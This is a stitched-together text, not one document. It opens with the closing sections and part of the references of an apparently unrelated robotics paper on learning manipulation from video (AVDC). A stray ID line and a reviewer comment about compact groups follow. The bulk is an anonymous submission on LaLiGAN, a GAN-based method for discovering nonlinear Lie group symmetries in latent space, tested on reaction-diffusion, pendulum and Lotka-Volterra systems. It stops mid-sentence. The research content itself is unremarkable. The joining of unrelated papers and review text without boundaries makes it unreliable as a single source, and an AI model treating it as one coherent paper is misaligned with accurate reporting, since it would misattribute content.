human demonstration datasets do not contain any action label relevant to our robot: Bridge is based on a different robot model and our tabletop videos are human hand manipulation videos. Zero-Shot Generalization of Bridge Model. We found that the video diffusion model trained on Bridge videos can reasonably generalize to real scenes without fine-tuning, as discussed in Section C. Results. The predicted object motion qualitative results on the Bridge dataset are presented in Figure 9. AVDC can reliably synthesize videos, predict optical flow, identify target objects, and infer actions. Figure 10 presents the visualizations of planned robot trajectories, showcasing the successful deployment of our system. More qualitative results can be found in Section B. We also quantitatively evaluated the entire pipeline. To this end, we set up 10 scenes with different initial object configurations and tasks. Each task requires a pick-and-place of an object of a specified category (e.g., apple) to a container (e.g., plate). The results are detailed in Section H.3. 5 Discussion Limitations. The proposed AVDC, while being successful in diverse simulated and real-world settings, faces several challenges. First, the algorithm may lose track of objects heavily occluded by the robot arm or struggle with optical flow prediction when there are rapid lighting changes or significant object movements. Additionally, our current implementation is not adept at handling tasks with deformable objects, requiring future work to develop new strategies for tracking or representing these objects, such as key-point-based tracking. Real-world manipulation tasks, which often require predicting grasps or contact points, are also challenging due to the disparity between human hands and different robot hands, necessitating the integration of specialized manipulation algorithms such as grasp prediction modules (Sundermeyer et al., 2021). Lastly, force information in RGB videos is unobtainable. Future work may consider leveraging real-world interaction data to address this. Conclusion. This work presents an approach to learning to act directly in environments given only RGB video demonstrations by exploiting dense correspondence between synthesized video frames. We illustrate the general applicability of our approach in both simulated and real-world manipulation and navigation tasks and cross-embodiment settings. We further present an open-source implementation for fast and efficient video modeling. We hope our work inspires further work on learning from videos, which can be readily found on the internet and readily captured across robots. Acknowledgement. We thank anonymous reviewers for their valuable comments. We gratefully acknowledge support from ONR MURI grant N00014-16-1-2007; from the Center for Brain, Minds, and Machines (CBMM, funded by NSF STC award CCF-1231216); from NSF grant 2214177; from Air Force Office of Scientific Research (AFOSR) grant FA9550-22-1-0249; from ONR MURI grant N00014-22-1-2740; from ARO grant W911NF-23-1-0034; from the MIT-IBM Watson AI Lab; from the MIT Quest for Intelligence; and from the Boston Dynamics Artificial Intelligence Institute. This project was partially supported by the National Science and Technology Council in Taiwan (NSTC 111-2221-E-002-189). Shao-Hua Sun was partially supported by the Yushan Fellow Program by the Ministry of Education, Taiwan. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of our sponsors. REFERENCES Shikhar Bahl, Abhinav Gupta, and Deepak Pathak. Human-to-robot imitation in the wild. In Robotics: Science and Systems, 2022. 2 Bowen Baker, Ilge Akkaya, Peter Zhokov, Joost Huizinga, Jie Tang, Adrien Ecoffet, Brandon Houghton, Raul Sampedro, and Jeff Clune. Video PreTraining (VPT): Learning to Act by Watching Unlabeled Online Videos. In Neural Information Processing Systems, 2022. 3 Homanga Bharadhwaj, Abhinav Gupta, Shubham Tulsiani, and Vikash Kumar. Zero-Shot Robot Manipulation from Passive Human Videos. arXiv:2302.02011, 2023. 2 Annie S Chen, Suraj Nair, and Chelsea Finn. Learning Generalizable Robotic Reward Functions from "In-The-Wild" Human Videos. In Robotics: Science and Systems, 2021. 2 Bhateja Chethan, Guo Derek, Ghosh Dibya, Singh Anikait, Tomar Manan, Vuong Quan, Chebotar Yevgen, Levine Sergey, and Kumar Aviral. Robotic Offline RL from Internet Videos via Value-Function Pre-Training. arXiv:2309.13041, 2023. 2, 3 Cheng Chi, Siyuan Feng, Yilun Du, Zhenjia Xu, Eric Cousineau, Benjamin Burchfiel, and Shuran Song. Diffusion policy: Visuomotor policy learning via action diffusion. In Proceedings of Robotics: Science and Systems (RSS), 2023. 6 Ethan Chun, Yilun Du, Anthony Simeonov, Tomas Lozano-Perez, and Leslie Kaelbling. Local Neural Descriptor Fields: Locally Conditioned Object Representations for Manipulation. In IEEE International Conference on Robotics and Automation, 2023. 2 Prafulla Dhariwal and Alexander Nichol. Diffusion Models Beat GANs on Image Synthesis. In Neural Information Processing Systems, 2021. 3, 4 Yiming Ding, Carlos Florensa, Pieter Abbeel, and Mariano Phiellipp. Goal-Conditioned Imitation Learning. In Neural Information Processing Systems, 2019. 2 Yilun Du, Mengjiao Yang, Bo Dai, Hanjun Dai, Ofir Nachum, Joshua B Tenenbaum, Dale Schuurmans, and Pieter Abbeel. Learning Universal Policies via Text-Guided Video Generation. In Neural Information Processing Systems, 2023. 1, 2, 3, 6 Frederik Ebert, Yanlai Yang, Karl Schmeckpeper, Bernadette Bucher, Georgios Georgakis, Kostas Daniilidis, Chelsea Finn, and Sergey Levine. Bridge Data: Boosting Generalization of Robotic Skills with Cross-Domain Datasets. In Robotics: Science and Systems, 2022. 9 Alejandro Escontrela, Ademi Adeniji, Wilson Yan, Ajay Jain, Xue Bin Peng, Ken Goldberg, Youngwoon Lee, Danijar Hafner, and Pieter Abbeel. Video Prediction Models as Rewards for Reinforcement Learning. arXiv:2305.14343, 2023. 3 Bin Fang, Shidong Jia, Di Guo, Muhua Xu, Shuhuan Wen, and Fuchun Sun. Survey of Imitation Learning for Robotic Manipulation. International Journal of Intelligent Robotics and Applications, 2019. 2
xbXASfz8MD
If I understood correctly, the proposed method works for compact groups only. The experiments demonstrate that the method can learn trajectories that are isomorphic to circles. How will the method behave on the data which has translation symmetry only? Will it fail? If so, the set of admissible symmetries seems more limited and should be highlighted
LATENT SPACE SYMMETRY DISCOVERY Anonymous authors Paper under double-blind review ABSTRACT Equivariant neural networks require explicit knowledge of the symmetry group. Automatic symmetry discovery methods aim to relax this constraint and learn invariance and equivariance from data. However, existing symmetry discovery methods are limited to linear symmetries in their search space and cannot handle the complexity of symmetries in real-world, often high-dimensional data. We propose a novel generative model, Latent LieGAN (LaLiGAN), which can discover nonlinear symmetries from data. It learns a mapping from data to a latent space where the symmetries become linear and simultaneously discovers symmetries in the latent space. Theoretically, we show that our method can express any nonlinear symmetry under certain conditions. Experimentally, our method can capture the intrinsic symmetry in high-dimensional observations, which results in a well-structured latent space that is useful for other downstream tasks. We demonstrate the use cases for LaLiGAN in improving equation discovery and long-term forecasting for various dynamical systems. 1 INTRODUCTION Symmetry plays an important role in the success of deep neural networks (Bronstein et al., 2021). Many equivariant networks have been developed to enforce various symmetries in data from images to graphs (Weller & Cesal, 2019; Cohen et al., 2019a; Zaheer et al., 2017; Finzi et al., 2020; Kondor & Trivedi, 2018; Cohen et al., 2019b; Finzi et al., 2021; Bekkers, 2019). A critical limitation of existing equivariant networks is that they require knowing the symmetry a priori. However, for complex real-world data, the underlying symmetries may be unknown or challenging to articulate through programming. Recent years have seen exciting attempts towards automatic symmetry discovery from data (Dehmamy et al., 2021; Moskalev et al., 2022; Benton et al., 2020; Zhou et al., 2021), but most of them search in only a limited space of symmetries, such as subsets of known groups or finite groups. LieGAN (Yang et al., 2023) can discover various types of symmetries, but its search space is still constrained to general linear groups. Successful discovery can only be achieved when observations are measured in an ideal coordinate system where linear symmetry is present. Unfortunately, real-world data often contain nonlinear symmetries, such as high-dimensional dynamics that evolve on a low-dimensional manifold (Champion et al., 2019), or 2D images of 3D objects (Garrido et al., 2023). Another line of study focuses on learning equivariant representations (Park et al., 2022; Yu et al., 2022; Dangovski et al., 2021; Quessard et al., 2020). These approaches learn a latent embedding space with particular symmetries. However, they still require prior knowledge about the symmetry in the latent space. Also, they often assume additional information about group transformation associated with each data point, which is not always available in practice. Figure 1: An example of SO(2) nonlinear group action $\pi'$ on $V = \mathbb{R}^2$ and its decomposition into an encoder $\phi$, a linear representation $\pi$ and a decoder $\psi$. Each trajectory is a group action orbit containing a random $v \in V$. In this work, we propose a novel framework, LaLiGAN, for discovering symmetries of nonlinear group actions. LaLiGAN decomposes the group transformations into nonlinear mappings between data space and latent space, and a linear group representation in the latent space. Figure 1 provides an example of such decomposition, where a nonlinear action of SO(2) on $V = \mathbb{R}^2$ corresponds to standard 2D rotation on latent vectors $z = \phi(v)$. Then, we utilize an existing symmetry discovery algorithm (Yang et al., 2023) with careful adaptations for discovering symmetries in the latent space. Normally, our framework has learnable group representation and does not require information about specific groups. However, when the symmetry group is known, it can also be used to learn equivariant representations without the information of group elements associated with each data sample. It is a highly flexible framework and can be applied to scenarios with scarce domain knowledge. The significance of latent space symmetry discovery is multi-fold. From the perspective of symmetry discovery, it further expands the search space of symmetries beyond linear group actions. For representation learning, learning a latent space in which symmetry becomes linear places a strong inductive bias on the structure of latent representations. Such a simple latent structure proves to be useful in various downstream tasks, such as equation discovery and long-term forecasting in temporal systems. Furthermore, compared to equivariant representation learning, as the symmetry is no longer fixed but learnable, our method can discover latent spaces with previously unknown symmetries. In summary, our main contributions include: - We develop LaLiGAN, a novel framework for discovering symmetries of nonlinear group actions. - We provide the theoretical guarantee that LaLiGAN has the expressive power to approximate any nonlinear symmetry under certain conditions. - Our method can discover well-structured latent spaces with interpretable symmetries in high-dimensional and nonlinear dynamical systems. - The discovered symmetry can be applied to equation discovery, leading to simpler equation forms and improved long-term prediction accuracy. 2 RELATED WORKS Automatic symmetry discovery. Automatic symmetry discovery aims to search and identify unknown symmetries in data. Current symmetry discovery techniques vary a lot in their search space for symmetries, such as learning discrete finite groups (Zhou et al., 2021; Karjol et al., 2023), learning group subsets that represent the extent of symmetry within known groups (Benton et al., 2020; Romero & Lohit, 2022; Chatzipantazis et al., 2021), and learning individual symmetry transformations on dataset distribution (Desai et al., 2022). Attempts have been made to discover general continuous symmetries based on Lie theory. For example, L-conv (Dehmmay et al., 2021) works with Lie algebra to approximate any group equivariant functions. LieGG (Moksalev et al., 2022) extracts symmetry from a learned network from its polarization matrix. LieGAN (Yang et al., 2023) proposes a general framework for discovering the symmetries of continuous Lie groups and discrete subgroups. These methods address general linear group symmetry in the data, which is the largest search space so far. Our work expands the search space to non-linear symmetries. Learning equivariant representation. Instead of working in the data space where symmetry transformations can be complicated, many works use autoencoders to learn a latent space with pre-specified symmetries (Hinton et al., 2011; Falorsi et al., 2018). Among recent works (Yu et al., 2022; Park et al., 2022), learn equivariant features that can be used for downstream prediction tasks. Shakerinava et al. (2022); Dangovski et al. (2021) use contrastive losses to learn equivariant representations in a self-supervised manner. Quessard et al. (2020); Marchetti et al. (2023) focus on learning disentangled representations that are highly interpretable. Winter et al. (2022); Wieser et al. (2020) split the latent space into group-invariant and equivariant subspaces. While the emphases of these works vary, the common assumption is that we have to know the symmetry group a priori. Many of them also assume additional information such as group element associated with each data point (Garrido et al., 2023) or paired samples under certain transformations (Shakerinava et al., 2022). Our goal is more ambitious: design a model to simultaneously learn symmetries and the corresponding equivariant representations in latent space with minimal supervision. Discovering governing equations. Latent space discovery of governing equations is first introduced in SINDy Autoencoder (Champion et al., 2019), which combines the sparse regression technique for discovering dynamics in Brunton et al. (2016) and an autoencoder network to explore coordinate transformations that lead to parsimonious equations. Several variants of this method have been developed to improve accuracy and robustness to noise (Kaheman et al., 2020; Messenger & Bortz, 2021; Fasel et al., 2022). However, due to the absence of physical constraints, their discovered equations may not respect some physical properties such as isotropy and energy conservation. We highlight this field as an important application of our symmetry discovery method, where enforcing symmetry can regularize the latent space and improve the performance of equation discovery models. 3 REPRESENTATION VS NONLINEAR GROUP ACTION Equivariant neural networks build on the notion of symmetry groups and their transformations on data. Given a vector space $V$, a group $G$ transforms $v \in V$ via a group action $\pi : G \times V \rightarrow V$ which maps the identity element $e$ to identity transformation, i.e. $\pi(e, v) = v$, and is compatible with group element composition, i.e. $\pi(g_1, \pi(g_2, v)) = \pi(g_1g_2, v)$. Many existing equivariant networks assume that the group acts linearly on the input vector space. Examples include E(2) symmetry acting on planar image signals (Weiler & Cesa, 2019), and SO(3) symmetry acting on spherical signals (Cohen et al., 2018). In these cases, the linear group action is called a group representation. The group representation is defined as a map $\rho : G \rightarrow GL(n)$ where $\rho(g) \in \mathbb{R}^{n \times n}$ is an invertible matrix that transforms any vector $v \in \mathbb{R}^n$ by matrix multiplication. Given the group representations on the input and the output spaces, a $G$-equivariant network $f : X \rightarrow Y$ needs to satisfy $\rho_Y(g)f(x) = f(\rho_X(g)x)$. A special case of equivariance is invariance, where the group action on the output space is trivial, i.e. $\rho_Y(g) = \text{id}$. Equivariant networks with such linear symmetry transformations have several limitations. It is not always possible to find a linear action of the group on the data, e.g. the action of SO(3) on 2D images of 3D objects. Also, we may not even know the symmetry group $G$ itself, so learning equivariant representations for known groups is also not an option. Our goal is to discover both the symmetry group and its nonlinear group action on the data. Concretely, given the input and output data space $X \subseteq \mathbb{R}^n$, $Y \subseteq \mathbb{R}^m$, and the data samples $(x_i, y_i) \in X \times Y$ with an underlying function $y = f(x)$, we want to find a group $G$ and its nonlinear actions $\pi'_X : G \times X \rightarrow X$ and $\pi'_Y : G \times Y \rightarrow Y$ such that $\pi'_Y(g, f(x)) = f(\pi'_X(g, x))$. We denote nonlinear group actions as $\pi'$ to distinguish them from group representations. In the following sections, we will also refer to group representations and nonlinear group actions as linear symmetries and nonlinear symmetries. We will use the theory of Lie groups to describe the continuous symmetry groups of data. We provide some preliminaries about Lie groups and their representations in Appendix B. 4 LaLiGAN: DISCOVERING NONLINEAR SYMMETRY TRANSFORMATIONS 4.1 DECOMPOSING THE NONLINEAR GROUP ACTION Our major goal is to learn a nonlinear action of a group $G$ on a vector space $V$: $\pi' : G \times V \rightarrow V$. While we can use a neural network $f_\theta$ to directly approximate this function, it does not guarantee the identity and compatibility conditions for a proper group action, i.e. $f_\theta(id, x) = x$ and $f_\theta(g_1, f_\theta(g_2, x)) = f_\theta(g_1g_2, x)$. Instead, we propose to decompose the nonlinear group action as nonlinear maps and a linear group representation. Concretely, we represent any nonlinear group action $\pi' : G \times V \rightarrow V$ as $$\pi'(g, \cdot) = \psi \circ \pi(g) \circ \phi,$$ where $\phi : V \rightarrow Z$ and $\psi : Z \rightarrow V$ are functions parametrized by neural networks, and $\pi(g) : G \rightarrow GL(k)$ is a group representation acting on the latent vector space $Z = \mathbb{R}^k$. We specify the dimensionality of $Z$ as a hyperparameter based on specific tasks. One can easily verify that Proposition 4.1. If $\phi$ and $\psi$ are inverse of each other, then $\pi'(g, \cdot) = \psi \circ \pi(g) \circ \phi$ is a valid group action that satisfies identity and compatibility axioms. Figure 2: Overview of the proposed LaLiGAN framework. The encoder maps the original observations to a latent space. The latent representation is transformed with the linear group action from the generator. The decoder reconstructs the inputs from original and transformed representations. The discriminator is trained to recognize the difference between the original and the transformed samples. In practice, we train the networks $\phi$ and $\psi$ with a reconstruction loss $l_{\text{recon}} = \mathbb{E}_v \|\psi(\phi(v)) - v\|^2$ to ensure they are the approximate inverse of each other. Intuitively, $\phi$ and $\psi$ form an autoencoder that maps between the input vector space and a latent space. Through the decomposition of the nonlinear group action, our method learns (1) the symmetry group on a latent space via its linear representation, and (2) a pair of inverse mappings between the input space and the symmetric latent space. We can provide theoretical guarantees for the expressivity of such a decomposition. The following theorem shows that our proposed decomposition and neural network parametrization can approximate nonlinear group actions under certain conditions. Detailed proof is deferred to Appendix C. **Theorem 4.2 (Universal Approximation of Nonlinear Group Action).** Let $G \leq \text{GL}(k; \mathbb{R})$ be a compact Lie group that acts smoothly, freely and properly on $V = \mathbb{R}^k$ via a continuous group action $\pi': G \times V \to V$. The group action, restricted to any bounded subset of the group, can be approximated by the decomposition $\pi'(g, \cdot) \approx \psi \circ \pi(q) \circ \phi$ if it admits a simply connected orbit space $V/G$, where $\psi$ and $\phi$ are fixed arbitrary-width neural networks with one hidden layer, and $\pi$ is a linear group representation. ### 4.2 Symmetry Discovery Now that we have constructed the nonlinear group action, we proceed to discover the symmetry group $G$. We restrict our search space to $G \leq \text{GL}(k)$, where $k$ is the latent dimensionality defined in the previous decomposition. In this way, we can represent any group element $g$ by its standard representation $\pi(g) \in \mathbb{R}^{k \times k}$. We expect this search space of the general linear group to be big enough to cover the types of symmetries in most real-world systems. We follow the approach in Yang et al. (2023) to discover the linear symmetry with generative adversarial training. Concretely, a symmetry generator learns a Lie algebra basis $\{L_i \in \mathbb{R}^{k \times k}\}$ and generates the standard representations of group elements by sampling the linear combination coefficients $w_i \in \mathbb{R}$ for the Lie algebra basis: $$w_i \sim \gamma(w), \quad \pi(g) = \exp \left[ \sum_i w_i L_i \right]$$ (2) where $\gamma$ is a distribution (e.g. Gaussian) for the coefficients and $\exp$ denotes the matrix exponential. As the Lie algebra basis $\{L_i\}$ uniquely determines the structure of the Lie group, we can learn the symmetry group by learning these $L_i$ via standard gradient-based optimization techniques. Then, the symmetry generator introduced in (2) samples random group elements that transform the data points $v_i = (x_i, y_i)$. The discriminator is trained to distinguish the original “real” data and the transformed “fake” data. The generator and the discriminator are trained adversarially so that the generator learns to produce group elements that preserve the data distribution while transforming each data point. The group learned by the generator is then considered the discovered symmetry of the data. Figure 2 shows the overall pipeline of our method. We term our method Latent LieGAN (LaLiGAN), as we learn the Lie group representations on a latent space. A key difference of our method is the nonlinearity of the group action on data, which is achieved through the decomposition in [19]. Besides, we use the latent representations as the discriminator input. The latent vectors before the group transformations are the “real” samples, and those after the transformations are “fake”. Optionally, we also concatenate each latent vector with its reconstruction in observation space as the discriminator input, which is shown to accelerate convergence. In the most general form, our training objective is formulated as \[ l_{\text{total}} = w_{\text{GAN}} \cdot l_{\text{GAN}} + w_{\text{recon}} \cdot l_{\text{recon}}, \quad l_{\text{recon}} = \mathbb{E}_v \left[ \| (\psi \circ \phi)(v) - v \|^2 \right], \] \[ l_{\text{GAN}} = \mathbb{E}_{v,g} \left[ \log D(\phi(v), (\psi \circ \phi)(v)) + \log(1 - D((\pi(g) \circ \phi)(v), (\psi \circ \pi(g) \circ \phi)(v))) \right] \] where \(D\) is the discriminator, \(\pi(g) = \exp(w^T L_i)\) is the representation of the group element sampled from the generator, and \(\phi\) and \(\psi\) are neural networks that compose the nonlinear group action together with \(\pi(g)\). The learnable components include \(D, L_i, \phi\) and \(\psi\), which are optimized under the joint objective \(l_{\text{total}}\). The loss weighting coefficients \(w_{\text{GAN}}\) and \(w_{\text{recon}}\) are selected based on specific tasks. 4.3 Structuring the Latent Space Disentangled representation. Latent space representations may capture different aspects of the observations. Consider an image of \(N\) 3D objects as an example. A possible latent representation consists of the orientation of each object \(r_o \in \mathbb{R}^{3N}\), the camera perspective \(r_c \in \mathbb{R}^3\), light intensity \(i \in \mathbb{R}^+\), etc. Each component can be transformed by a separate group action, independent of each other. For these scenarios, we provide the option to specify how the latent space is decomposed as independent subspaces, i.e. \(Z = \oplus_{i=1}^N Z_i\), each of which is acted on by a symmetry group \(G_i\). This avoids searching in the unnecessarily large space of group actions with no nontrivial invariant subspace. This aligns with the notion of disentangled representation in Higgins et al. (2018). Regularizing the latent structure. The latent space produced by an encoder network can be largely arbitrary, leading to fallacious symmetry or no symmetry at all. We observe some failure modes caused by undesirable latent space structures and propose some regularization methods. First, the latent representations tend to collapse to a low-dimensional subspace where nontrivially parametrized group representations can act as identity. Such a fallacious symmetry provides an easy workaround for the symmetry generator. For example, this happens in Figure 3a where the transformations generated by \(L = [2, -2; -1, 1] \in \mathbb{R}^{2 \times 2}\) leave the latent representations in a 1D subspace approximately unchanged. This is undesirable because we want the symmetry generator to learn nontrivial transformations. In practice, we use orthogonal parametrization in the final linear layer of the encoder to enforce a different output in each dimension. Another failure mode occurs when the latent representations are not centered at the origin. The linear group representation \(v \mapsto \pi(g)v\) implicitly assumes that the vector space is centered at the origin and cannot describe the symmetry otherwise. Figure 3b provides an example of a circular latent space centered at \((1, 1)\). Directly applying the SO(2) transformations result in a different distribution. We observe that the encoder struggles to learn to center the latent representations at the origin. Therefore, we enforce this property by normalizing each batch of data to have zero mean before applying the transformations from the symmetry generator. Figure 3: Potential failure modes in latent space symmetry discovery. (a) Fallacious symmetry in low-dimensional subspace. (b) Absence of symmetry in a biased latent space. 4.4 Applications of Latent Symmetry Discovery Learning equivariant representation. Learning equivariant representation can be viewed as a special case of our method, where the symmetry group $G$ and its representation $\pi$ are known. Our encoder $\phi$ then becomes a $G$-equivariant function in the sense that $$\phi(\pi'(g, x)) = \phi((\psi \circ \pi(g) \circ \phi)(x)) = \pi(g)\phi(x)$$ (4) In other words, by fixing $\pi$ to a known group representation, our method learns a $G$-equivariant representation $z = \phi(x)$. Compared to other methods, LaLiGAN can learn equivariant representation without any knowledge of the group transformation associated with each data sample. Joint discovery of governing equation. LaLiGAN is analogous to latent space equation discovery techniques [Champion et al., 2019] in terms of using an autoencoder network for nonlinear coordinate transformations. We can use the latent space learned by LaLiGAN for discovering equations. Concretely, if we want to find a latent space governing equation parameterized by $\theta$: $\dot{z} = F_\theta(z)$, where $z = \phi(x)$ is obtained from our encoder network, we fix the encoder $\phi$ and optimize $\theta$ with the objective $l_{eq} = \mathbb{E}_{x,z}\|(\nabla_x z)\dot{x} - F_\theta(z)\|^2$. While equation discovery and symmetry discovery are two seemingly distinct tasks, we will show in the experiment that learning a symmetric latent space can significantly improve the quality of the discovered equation in terms of both its simplicity and its long-term prediction accuracy. 5 Latent Symmetry in Dynamical Systems 5.1 Datasets Reaction-diffusion. Many high-dimensional datasets in practical engineering and science problems derive from dynamical systems governed by partial differential equations. These systems often do not exhibit simple linear symmetries in the observation space, but their dynamics might evolve on a low-dimensional manifold with interesting symmetry properties. As an example, we consider a $\lambda-\omega$ reaction-diffusion system [Champion et al., 2019] governed by $$u_t = (1 - (u^2 + v^2))u + \beta(u^2 + v^2)v + d_1(u_{xx} + u_{yy})$$ $$v_t = -\beta(u^2 + v^2)u + (1 - (u^2 + v^2))v + d_2(u_{xx} + u_{yy})$$ (5) with $d_1 = d_2 = 0.1$ and $\beta = 1$. We discretize the 2D space into a $100 \times 100$ grid, which leads to an input dimension of $10^4$. Figure 4b visualizes a few snapshots of this system. We simulate the system up to $T = 6000$ timesteps with step size $\Delta t = 0.05$. The reaction-diffusion system is an example of low-dimensional latent symmetry in high-dimensional observations. In fact, the absence of linear symmetry is not exclusive to high-dimensional systems. We also investigate two low-dimensional dynamics, where their nonlinear evolution prevents any kind of linear symmetry, but our method can still discover meaningful symmetries in the latent space. Nonlinear pendulum. The movement of a simple pendulum can be described by $\dot{q} = p$, $\dot{p} = -\omega^2 \sin(q)$, with $\omega$ being the natural frequency and $q$ and $p$ the angular displacement and angular momentum. In our experiment, we use $\omega = 1$. We simulate $N = 200$ trajectories up to $T = 500$ timesteps with $\Delta t = 0.02$. Lotka-Volterra System. The Lotka-Volterra equations are a pair of nonlinear ODEs that characterize the dynamics of predator-prey interaction. We consider the canonical form of the equations, $\dot{p} = a - bp$, $\dot{q} = cp - d$, where $p$ and $q$ are the logarithm population densities of prey and predator, and the parameters $a, b, c, d$ indicate the growth and death rate of the two populations. In our experiment, we use $a = 2/3$, $b = 4/3$, and $c = d = 1$. We simulate $N = 200$ trajectories up to $T = 10^4$ timesteps with $\Delta t = 0.002$. 5.2 Symmetry Discovery We train LaLiGAN to learn the nonlinear mappings between observations and latent representations, along with the linear symmetry in the latent space. We aim to discover the equivariance of latent Figure 4: Symmetry discovery in reaction-diffusion system with 2D latent space. (a) Latent representations of the system at all timesteps. (b) Randomly selected samples from the dataset. (c) Samples transformed by LaLiGAN are similar to the original data. (d) Samples transformed by the baseline, linear LieGAN, are significantly different from the original data. Figure 5: Latent symmetry discovery in nonlinear pendulum (upper) and Lotka-Volterra equations (lower). (a) Original trajectories of the systems. The color of each trajectory corresponds to its Hamiltonian. (b) The trajectories are mapped to a symmetric latent space. (c) Original trajectories transformed by LaLiGAN. (d) Original trajectories transformed by linear LieGAN. dynamics, i.e. \( z_{t+1} = f(z_t) \Rightarrow gz_{t+1} = f(gz_t) \). Therefore, we take two consecutive timesteps as input, encode them to latent representations with the same encoder weights, and apply the same transformations sampled from the symmetry generator. For the reaction-diffusion system, we follow the setting in Champion et al. (2019) and set the latent dimension \( k = 2 \). Figure 4a shows how the system evolves in the latent space throughout \( T = 5000 \) timesteps. The Lie algebra basis discovered in the latent space is \( L = [0.06, -3.07; 3.05, -0.04] \). This suggests an approximate SO(2) symmetry, which is also evident from the visualization. For the pendulum and the Lotka-Volterra system, we also set the latent dimensions to 2, which is the same as their input dimensions. Figure 5b shows the trajectories of these two systems in the latent space, with the discovered symmetries \( L_{\text{pendulum}} = [0, -5.24; 2.16, 0] \) and \( L_{\text{LV}} = [0, 2.43; -2.74, 0] \). These indicate rotation symmetries up to a certain scaling in the latent dimensions. The validity of the discovered symmetry can be verified by visually inspecting the difference between the transformed and the original samples. For the reaction-diffusion system, Figure 4c shows some samples with random transformations produced by our method, which are similar to the original data displayed in Figure 4b. We also apply the original LieGAN to this task for comparison, and the transformed samples are shown in Figure 4d. These samples contain obvious artifacts and are noticeably different from the original data, which suggests the necessity of our method when linear symmetry does not exist in observation space. Similarly, for the pendulum and the Lotka-Volterra system, we use the learned symmetries to transform each entire trajectory, as is shown in Figure 5c. Each trajectory is transformed from the original trajectory of the same color. While each individual data point is taken into a new position, the entire trajectories remain similar before and after transformation, suggesting that the discovered transformations are indeed the symmetries of these systems. In contrast, the linear symmetries learned by LieGAN do not preserve valid trajectories in the observation space, as shown in Figure 5d. 5.3 Effect of Latent Dimensionality The latent dimension $k$ is a hyperparameter in our method. However, it is not always possible to choose the perfect latent dimension that matches the intrinsic dimension of the system and uncovers symmetry in latent space. To study the robustness of our method under a less ideal hyperparameter configuration, we set the latent dimension to $k = 3$ for the reaction-diffusion system and repeat the experiment. As shown in Figure 6a, the Lie algebra representation is skew-symmetric, which indicates the symmetry of rotations around a particular axis. This can be easily confirmed as all the latent representations roughly dwell on a circular 2D subspace. Although it is not the most simple representation, our method still manages to discover the rotation symmetry as in 2D latent space. ![Figure 6](image) Figure 6: Modeling reaction-diffusion system in 3D latent space. (a) The latent representations before and after our discovered symmetry transformations. (b) The discovered latent space with SINDy but without LaLiGAN. (c-d) Simulation trajectory in the previous two latent spaces. 5.4 Equation Discovery We demonstrate the benefit of learning latent symmetry by using the latent space to discover governing equations. This is a commonly considered problem in these dynamical systems. We use SINDy (Brunton et al., 2016) (Champion et al., 2019) as the equation discovery algorithm, with up to second order polynomials as candidate functions. The comparison is made between applying SINDy on the latent space learned by our method (LaLiGAN + SINDy) and using the SINDy autoencoder to learn its own latent space (SINDy AE). The results for the reaction-diffusion system are shown in Table 1. The discovered equations from both methods have similar forms in the 2D latent space. In the 3D latent space, the governing equation learned in the LaLiGAN latent space remains linear. On the other hand, applying the SINDy autoencoder alone results in a nonsymmetric latent space (Figure 6b) and a highly complicated governing equation with second-order terms. | Method | 2D | 3D | |-----------------|--------------------------------------------------------------------|--------------------------------------------------------------------| | LaLiGAN + SINDy | $\dot{z}_1 = -0.91z_2$, $\dot{z}_2 = -0.91z_1$ | $\dot{z}_1 = 0.58z_2 - 0.40z_3$, $\dot{z}_2 = -0.56z_1 + 0.54z_3$, $\dot{z}_3 = 0.45z_1 - 0.57z_2$ | | SINDy AE | $\dot{z}_1 = -0.85z_2$, $\dot{z}_2 = 0.97z_1$ | $\dot{z}_1 = 0.65z_2 - 0.16z_3 + \Theta(z^2)$, $\dot{z}_2 = -0.57z_1 + 0.18z_2 + \Theta(z^2)$, $\dot{z}_3 = 0.45z_1 - 0.57z_2 + \Theta(z^2)$ | Table 1: Equation discovery on 2D/3D latent spaces for R-D system. Complete results are available in Appendix A.1. Long-term forecasting. To further verify the accuracy of the discovered equations, we use these equations to simulate the dynamics in the latent space. Concretely, given the initial input frame $x_0$, we obtain its latent representation $\hat{z}_0 = \phi(x_0)$ and predict the future $T$ timesteps by iteratively computing $\hat{z}_{t+1} = \hat{z}_t + F(\hat{z}_t) \cdot \Delta t$, where $\hat{z} = F(\hat{z})$ denotes the discovered governing equation. Then, we map the representations back to the input space by $\hat{x}_t = \psi(\hat{z}_t)$. Figure 6c and 6d show the simulated latent trajectories from the equations discovered in 3D latent space with and without LaLiGAN. The trajectory remains close to ground truth in the symmetric latent space but diverges quickly for the equation discovered by SINDy AE. We also evaluate the forecasting accuracy quantitatively by the relative MSE between the prediction and ground truth in the observation space, as is shown in Figure 7. Besides the symbolic models in Table 1, we also include Neural ODE (Chen et al., 2018) as a baseline. Similar to the symbolic equation discovery, it can also predict the dynamics at arbitrary timesteps with an ODE parametrized by neural nets. Figure 7 shows that the discovered equation learned with latent space symmetry outperforms both the equation from vanilla SINDy AE and the Neural ODE model in this task of long-term dynamics forecasting. We also conduct the same experiments of equation discovery and long-term forecasting as for the nonlinear pendulum and the Lotka-Volterra system. While they have simple closed-form governing equations in the observation space, we find that discovering a latent space with learnable symmetry can still be beneficial. The symmetry enforces linear governing equations and leads to reduced error accumulation in long-term forecasting. The detailed results are available in Appendix A.2. 6 Learning Equivariant Representation Figure 8: Learning equivariant representation of the double-bump world. (a) Learned latent space as the direct sum of two 2D subspaces. The color of the data points corresponds to the location of the rectangular bump in the first component and the triangular bump in the second. (b) From left to right: (1) an original signal $x \in \mathbb{R}^{64}$; (2) reconstructed signal $\psi(\phi(x))$; (3-4) reconstructed signals from transformed latent representations, $\psi((\pi(\theta_1) \oplus I)\phi(x))$ and $\psi((I \oplus \pi(\theta_2))\phi(x))$. The red lines are the bump centers in the original signal. When we know the linear group representation, we can use LaLiGAN for learning the corresponding group equivariant representation. Unlike previous works (Garrido et al., 2023; Shakerinava et al., 2022), we learn it without any knowledge of the group element associated with each data point. We consider the example of a double-bump world in Shakerinava et al. (2022). It consists of a rectangular and a triangular bump signal, both cyclically shifted in a fixed-length window. We use the original experiment setting with signal length 64 and bump length 16, visualized in Figure 8B. The cyclic translation of each bump forms an SO(2) group. As each bump is shifted independently, the symmetry group for the composed signal is SO(2) × SO(2). Therefore, we use a 4-dimensional latent space $Z = \mathbb{R}^2 \oplus \mathbb{R}^2$ and fix the Lie algebra basis to $L = L_1 \oplus L_2$, $L_1 = L_2 = [0, 1; -1, 0]$. Figure 8A shows the latent space learned by LaLiGAN. We observe that rotation in the first component shifts the rectangular bump, while rotation in the second component simultaneously shifts both bumps. This is also evident from the transformed and reconstructed 